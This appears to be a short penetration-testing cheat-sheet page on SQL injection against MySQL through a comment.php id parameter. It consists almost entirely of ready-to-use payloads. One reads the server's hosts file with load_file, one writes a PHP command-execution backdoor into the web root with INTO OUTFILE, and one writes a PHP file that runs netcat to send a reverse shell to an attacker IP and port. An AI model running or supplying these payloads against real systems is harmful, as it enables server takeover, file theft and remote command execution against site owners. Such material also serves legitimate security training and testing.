SQL Shells

Reading files from the server (mysql)

load_file function

http://<IP>/comment.php?id=735 union select 1,2,3,4,load_file('C:/windows/system32/drivers/etc/hosts'),6

Code Injection (mysql)

into OUTFILE

http://<IP>/comment.php?id=735 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'

  • then browse to backdoor.php and run a command by appending ?cmd=<cmd>

http://<IP>/backdoor.php

Spawning a shell (mysql)

  • first start a netcat listener on your attacking system

  • in this example we will listen on port 9001

  • next, inject into the get request to connect to our attacking system on 9001 via netcat

http://<IP>/comment.php?id=735 union select 1,2,3,4,"<?php exec('nc.exe 10.11.0.76 9001 -e cmd.exe'); ?>",6 into OUTFILE 'c:/xampp/htdocs/reverse_shell.php'

>>> browse to our file and then check back with netcat for the connection;

PreviousPHP ShellsNextOracle Padding Attack

Last updated